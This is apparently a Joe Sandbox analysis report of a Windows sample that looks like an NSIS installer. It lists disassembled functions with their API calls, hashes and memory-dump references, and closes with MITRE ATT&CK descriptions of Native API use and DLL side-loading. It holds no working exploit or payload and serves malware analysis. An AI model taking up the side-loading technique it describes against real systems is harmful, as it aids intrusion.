Associated: 00000002.00000002.43457637795.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.43457709803.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.43457745120.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.43457782280.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Fac.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s$6B
API String ID: 3540041739-3884863406
Opcode ID: a815db82b42f543a9dd6a4ec2ba834401da5a56b00b51e1f2b8fc7ff7c1c6173
Instruction ID: 22ef8b20c3cb34d9681d0f1950c5ee3b7e818b69147609aa9b6e87f13a537159
Opcode Fuzzy Hash: a815db82b42f543a9dd6a4ec2ba834401da5a56b00b51e1f2b8fc7ff7c1c6173
Instruction Fuzzy Hash: 18110833A041283BDB10A96D9C46F9F329CDB85374F250237FA26F21D1DA79DC2182E8

Function 00406518 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,*?|<>/":,00000000,00000000,00437800,00437800,00435000,00403334,00437800,77293420,004035A3,?,00000006,00000008,0000000A), ref: 0040657B
CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 0040658A
CharNextW.USER32(?,00000000,00437800,00437800,00435000,00403334,00437800,77293420,004035A3,?,00000006,00000008,0000000A), ref: 0040658F
CharPrevW.USER32(?,?,00437800,00437800,00435000,00403334,00437800,77293420,004035A3,?,00000006,00000008,0000000A), ref: 004065A2

Strings

*?|<>/":, xrefs: 0040656A

Memory Dump Source

Source File: 00000002.00000002.43457672359.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.43457637795.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.43457709803.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.43457745120.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.43457782280.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Fac.jbxd

Similarity

API ID: Char$Next$Prev
String ID: *?|<>/":
API String ID: 589700163-165019052
Opcode ID: f2dbc7d310367101a7bf5127f564121aa95c210a65fb008c6410ea5a4ac792ac
Instruction ID: 9d8e3f8f3784457604ea521ff392e3c8e3efc90107dbe880bee10e7696629eb6
Opcode Fuzzy Hash: f2dbc7d310367101a7bf5127f564121aa95c210a65fb008c6410ea5a4ac792ac
Instruction Fuzzy Hash: AB11B655800616A5DB303B18BC44A7762F8AF54B60F92403FED89736C5F77C5C9286BD

Function 0040176F Relevance: 7.6, APIs: 5, Instructions: 145stringtimeCOMMON

Download Yara Rule

APIs

lstrcatW.KERNEL32(00000000,00000000,0040A5A8,00436000,?,?,00000031), ref: 004017B0
CompareFileTime.KERNEL32(-00000014,?,0040A5A8,0040A5A8,00000000,00000000,0040A5A8,00436000,?,?,00000031), ref: 004017D5

Part of subcall function 00406284: lstrcpynW.KERNEL32(?,?,00000400,0040342A,00429200,NSIS Error,?,00000006,00000008,0000000A), ref: 00406291

Part of subcall function 004052EC: lstrlenW.KERNEL32(004226C8,00000000,?,004030B0,?,?,?,?,?,?,?,?,?,0040324F,00000000,?), ref: 00405324
Part of subcall function 004052EC: lstrlenW.KERNEL32(0040324F,004226C8,00000000,?,004030B0,?,?,?,?,?,?,?,?,?,0040324F,00000000), ref: 00405334
Part of subcall function 004052EC: lstrcatW.KERNEL32(004226C8,0040324F,0040324F,004226C8,00000000,?,004030B0), ref: 00405347
Part of subcall function 004052EC: SetWindowTextW.USER32(004226C8,004226C8), ref: 00405359
Part of subcall function 004052EC: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040537F
Part of subcall function 004052EC: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405399
Part of subcall function 004052EC: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053A7

Memory Dump Source

Source File: 00000002.00000002.43457672359.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.43457637795.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.43457709803.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.43457745120.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.43457782280.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Fac.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID:
API String ID: 1941528284-0
Opcode ID: 590c3d2934c31b3987365f8331b25d81c0607cb668f8e26b6ea01865aa0ee0af
Instruction ID: 128eea75dfaaf3eda36781b62dd3037428c7b97943fe82b2985fb16c69cf4114
Opcode Fuzzy Hash: 590c3d2934c31b3987365f8331b25d81c0607cb668f8e26b6ea01865aa0ee0af
Instruction Fuzzy Hash: C541A031900519BFCF10BBA5CD46EAE3679EF45328B20427FF412B10E1CA3C8A519A6E

Function 00401DB9 Relevance: 7.5, APIs: 5, Instructions: 43COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00401DBC
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD6
MulDiv.KERNEL32(00000000,00000000), ref: 00401DDE
ReleaseDC.USER32(?,00000000), ref: 00401DEF
CreateFontIndirectW.GDI32(0040CDA8), ref: 00401E3E

Memory Dump Source

Source File: 00000002.00000002.43457672359.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.43457637795.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.43457709803.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.43457745120.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.43457782280.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Fac.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectRelease
String ID:
API String ID: 3808545654-0
Opcode ID: 2e8c6812557a8000d290618689d5c167272f7de43d41522ca2a47e16c60e8740
Instruction ID: af8ff02f4bd052a881cb17574bfe8b5bbda2d2cac472569fbfdf17f98f113d3f
Opcode Fuzzy Hash: 2e8c6812557a8000d290618689d5c167272f7de43d41522ca2a47e16c60e8740
Instruction Fuzzy Hash: 39017571948240EFE7406BB4AF8ABD97FB49F95301F10457EE241B71E2CA7804459F2D

Function 00401D5D Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 00401D63
GetClientRect.USER32(00000000,?), ref: 00401D70
LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D91
SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D9F
DeleteObject.GDI32(00000000), ref: 00401DAE

Memory Dump Source

Source File: 00000002.00000002.43457672359.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.43457637795.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.43457709803.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.43457745120.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.43457782280.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Fac.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 46abf127b461966594539b2cb00e82417843b13178a7bdfc66a6853df7de0eec
Instruction ID: 40ca5798c6d3b59526a1ee34621216737133408fbccdd52925800404f238639f
Opcode Fuzzy Hash: 46abf127b461966594539b2cb00e82417843b13178a7bdfc66a6853df7de0eec
Instruction Fuzzy Hash: A3F0EC72A04518AFDB01DBE4DE88CEEB7BCEB48301B14047AF641F61A0CA749D519B78

Function 00401C1F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C8F
SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA7

Strings

!, xrefs: 00401C5B

Memory Dump Source

Source File: 00000002.00000002.43457672359.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.43457637795.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.43457709803.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.43457745120.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.43457782280.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Fac.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 9583f5a57c3a775296e031cb14509230db2970ced6148bfab5cafbeadf370f61
Instruction ID: 994eb4c646dc30d4db2129160ed463076ae6c8af372a05c6722ea4476ca57ad0
Opcode Fuzzy Hash: 9583f5a57c3a775296e031cb14509230db2970ced6148bfab5cafbeadf370f61
Instruction Fuzzy Hash: 8E21C371948209AEEF049FB5DE4AABE7BB4EF84304F14443EF605B61D0D7B889409B28

Function 00402D44 Relevance: 6.1, APIs: 4, Instructions: 63registryCOMMON

Download Yara Rule

APIs

RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402DA9
RegCloseKey.ADVAPI32(?,?,?), ref: 00402DB2
RegCloseKey.ADVAPI32(?,?,?), ref: 00402DD3

Memory Dump Source

Source File: 00000002.00000002.43457672359.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.43457637795.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.43457709803.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.43457745120.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.43457782280.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Fac.jbxd

Similarity

API ID: Close$Enum
String ID:
API String ID: 464197530-0
Opcode ID: a4e23b119c2c64eb18a4fa0724f9b8d9fe0ec592ff9815e45bdb7592abe1cef3
Instruction ID: 673fb129a4d8ab743942914098bbacbd975ea3c1b6875aa08396d434171036d0
Opcode Fuzzy Hash: a4e23b119c2c64eb18a4fa0724f9b8d9fe0ec592ff9815e45bdb7592abe1cef3
Instruction Fuzzy Hash: C7116A32500108FBDF02AB90CE09FEE7B7DAF54340F100076B905B51E0EBB59E21AB58

Function 004057BB Relevance: 6.0, APIs: 4, Instructions: 39COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNEL32(?,?,00000000), ref: 004057FE
GetLastError.KERNEL32 ref: 00405812
SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405827
GetLastError.KERNEL32 ref: 00405831

Memory Dump Source

Source File: 00000002.00000002.43457672359.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.43457637795.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.43457709803.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.43457745120.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.43457782280.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Fac.jbxd

Similarity

API ID: ErrorLast$CreateDirectoryFileSecurity
String ID:
API String ID: 3449924974-0
Opcode ID: c7775b55854fc79259119bfc4daa9494171cd7cf58f96f816c013ac7f64a11dc
Instruction ID: bfe53add753044f5513d0e7cef191a671c10544bda2f5855e72e4bfb682ac43c
Opcode Fuzzy Hash: c7775b55854fc79259119bfc4daa9494171cd7cf58f96f816c013ac7f64a11dc
Instruction Fuzzy Hash: 14011A72D00619DADF009FA4C9447EFBBB4EF14355F00843AD945B6281DB789658CFE9

Function 00402E79 Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,00000000,00403059,00000001,?,00000006,00000008,0000000A), ref: 00402E8C
GetTickCount.KERNEL32 ref: 00402EAA
CreateDialogParamW.USER32(0000006F,00000000,00402DF3,00000000), ref: 00402EC7
ShowWindow.USER32(00000000,00000005,?,00000006,00000008,0000000A), ref: 00402ED5

Memory Dump Source

Source File: 00000002.00000002.43457672359.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.43457637795.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.43457709803.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.43457745120.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.43457782280.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Fac.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: e645c8c421be7eabc5c3352734f208b7209d36df5043eda8f294b58fcdf419c5
Instruction ID: aa51e3e4afe09322c41c699d4a644ad1219c84700ea5711a82ba7ac080bff55b
Opcode Fuzzy Hash: e645c8c421be7eabc5c3352734f208b7209d36df5043eda8f294b58fcdf419c5
Instruction Fuzzy Hash: EFF0DA30545720EFC7616B60FE0CA9B7B65BB04B11741497EF449F12A4DBB94891CAAC

Function 00405260 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 0040528F
CallWindowProcW.USER32(?,?,?,?), ref: 004052E0

Part of subcall function 00404247: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404259

Strings

, xrefs: 00405270

Memory Dump Source

Source File: 00000002.00000002.43457672359.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.43457637795.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.43457709803.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.43457745120.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.43457782280.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Fac.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: 658d549574eddfd40241b3641b5f57dbd5b689929234e885e7ca98b3be3bb27d
Instruction ID: 4f709491620671f980d9c6db17d5b9619efa9f8d8c8bffacc159c43cff332a87
Opcode Fuzzy Hash: 658d549574eddfd40241b3641b5f57dbd5b689929234e885e7ca98b3be3bb27d
Instruction Fuzzy Hash: 20019E7120060CAFDB319F40ED80A9B3B26EF90715F60007AFA00B52D1C73A9C529F69

Function 00405DA9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00405DC7
GetTempFileNameW.KERNEL32(?,?,00000000,?,?,?,00435000,00403357,00437000,00437800,00437800,00437800,00437800,00437800,77293420,004035A3), ref: 00405DE2

Strings

nsa, xrefs: 00405DB6

Memory Dump Source

Source File: 00000002.00000002.43457672359.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.43457637795.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.43457709803.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.43457745120.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.43457782280.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Fac.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: nsa
API String ID: 1716503409-2209301699
Opcode ID: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
Instruction ID: 8d675393d4be3a1a13ee7cec111603dd999094634a9ab4ae6aafa5463bef85a0
Opcode Fuzzy Hash: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
Instruction Fuzzy Hash: 9BF03076A00304FBEB00DF69DD09E9BB7A9EF95710F11803BE900E7250E6B09954DB64

Function 0040586D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,004266F0,Error launching installer), ref: 00405896
CloseHandle.KERNEL32(?), ref: 004058A3

Strings

Error launching installer, xrefs: 00405880

Memory Dump Source

Source File: 00000002.00000002.43457672359.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.43457637795.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.43457709803.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.43457745120.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.43457782280.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Fac.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: 7638236436ef790ce86ec485bfd7c6daeab9176ea3d70cd1a4e3ce55c648647a
Instruction ID: 38a1dae354cb2a4c5fc32891eb37452fbeb174cf60b6e0268020382365bb363f
Opcode Fuzzy Hash: 7638236436ef790ce86ec485bfd7c6daeab9176ea3d70cd1a4e3ce55c648647a
Instruction Fuzzy Hash: FFE0BFB560020ABFFB10AF64ED05F7B7AACFB14704F414535BD51F2150D7B898158A78

Function 00406DC3 Relevance: 5.2, APIs: 4, Instructions: 236COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.43457672359.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.43457637795.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.43457709803.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.43457745120.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.43457782280.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Fac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2379a6b80c2bc0c9d89d3ff48ecf146a73f88eb31b703b146685e5d0c657cb03
Instruction ID: 28e39518df3801c38e3280a2e83f64e055c3b15caa2ea9a1a3761292ca1e3da9
Opcode Fuzzy Hash: 2379a6b80c2bc0c9d89d3ff48ecf146a73f88eb31b703b146685e5d0c657cb03
Instruction Fuzzy Hash: F9A15371E04229CBDB28CFA8C8547ADBBB1FF44305F10816ED456BB281C7786A86DF45

Function 00406FC4 Relevance: 5.2, APIs: 4, Instructions: 208COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.43457672359.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.43457637795.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.43457709803.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.43457745120.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.43457782280.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Fac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a97e96a70b1528884494d5a2455c9c9c8bf64013d0c9d0d58a0b179d1d34f865
Instruction ID: 90999bc76b255a60827136b2fd47affe8781ac3d45706895e3c6f95813f0c94e
Opcode Fuzzy Hash: a97e96a70b1528884494d5a2455c9c9c8bf64013d0c9d0d58a0b179d1d34f865
Instruction Fuzzy Hash: 21913F71D04229CBDB28CF98C8547ADBBB1FF44305F14816ED456BB291C378AA86DF45

Function 00406CDA Relevance: 5.2, APIs: 4, Instructions: 205COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.43457672359.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.43457637795.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.43457709803.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.43457745120.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.43457782280.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Fac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 526acb6b229722c101271a282f82fa7e8491aea9f4c983caca1afef0c2905762
Instruction ID: 7ab5a6fdb7118453f5bc4abdeeb58a7f0a93ca16cb9ae78d5f3cb9c6a39904d0
Opcode Fuzzy Hash: 526acb6b229722c101271a282f82fa7e8491aea9f4c983caca1afef0c2905762
Instruction Fuzzy Hash: 8E814471E04229DBDF24CFA8C8447ADBBB1FF44301F24816AD456BB291C778AA86DF15

Function 004067DF Relevance: 5.2, APIs: 4, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.43457672359.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.43457637795.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.43457709803.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.43457745120.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.43457782280.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Fac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d01b1c5effafd64d8cfad2db312f22eb5162b5418c1bb992621b7de497566ec4
Instruction ID: 21cf7db9f51931c48f99e7e9547f5b24ff728e46d141457ef608e09f17fb8729
Opcode Fuzzy Hash: d01b1c5effafd64d8cfad2db312f22eb5162b5418c1bb992621b7de497566ec4
Instruction Fuzzy Hash: 4C815571D04229DBDB24CFA9D8447ADBBB0FB44301F2081AEE456BB281C7786A86DF55

Function 00406C2D Relevance: 5.2, APIs: 4, Instructions: 180COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.43457672359.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.43457637795.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.43457709803.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.43457745120.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.43457782280.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Fac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 133937f1df7ceb29c30f38c33f45990f246052236d4704b56955204b6cd885fa
Instruction ID: dacb8e277fcbb3a33cac5efaa2c5173e23fd2fcd6bf81bdfe6f06a7534410a90
Opcode Fuzzy Hash: 133937f1df7ceb29c30f38c33f45990f246052236d4704b56955204b6cd885fa
Instruction Fuzzy Hash: 6C714371E04229CBDF24CF98C8447ADBBB1FF44305F14806AD446BB281C738AA86DF04

Function 00406D4B Relevance: 5.2, APIs: 4, Instructions: 170COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.43457672359.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.43457637795.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.43457709803.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.43457745120.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.43457782280.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Fac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0a10928d7685989459388dead70c60bd1e808e0421cae42356cd2ce25e8ee986
Instruction ID: 610106becc8cf73b6091924598cab7a4a25495cbbf2bb893dbe28c15679d0a85
Opcode Fuzzy Hash: 0a10928d7685989459388dead70c60bd1e808e0421cae42356cd2ce25e8ee986
Instruction Fuzzy Hash: 5C714271E04229CBDB28CF98C844BADBBB1FF44301F14816AD456BB291C738A986DF45

Function 00406C97 Relevance: 5.2, APIs: 4, Instructions: 168COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.43457672359.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.43457637795.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.43457709803.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.43457745120.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.43457782280.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Fac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 11d0e2bf2ab0c12615b3c88e0718215a3c217c66979ab711a777e3af05fd446c
Instruction ID: 65b73de0ce6de3c7b1653dbcc26eb67f08ce95b734c4b9eb4028e98c7b5a0113
Opcode Fuzzy Hash: 11d0e2bf2ab0c12615b3c88e0718215a3c217c66979ab711a777e3af05fd446c
Instruction Fuzzy Hash: 0B714371E04229DBEF28CF98C8447ADBBB1FF44305F11806AD456BB291C738AA96DF45

Function 00405CDF Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FC4,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CEF
lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405D07
CharNextA.USER32(00000000,?,00000000,00405FC4,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D18
lstrlenA.KERNEL32(00000000,?,00000000,00405FC4,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D21

Memory Dump Source

Source File: 00000002.00000002.43457672359.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.43457637795.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.43457709803.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.43457745120.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.43457782280.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Fac.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
Instruction ID: 3a8cc870ad476bca9dd132dfabecf91d91790aae7b943354cd32c9fe52050a58
Opcode Fuzzy Hash: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
Instruction Fuzzy Hash: 09F0F631204918FFDB029FA4DD0499FBBA8EF16350B2580BAE840F7211D674DE01AB98

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
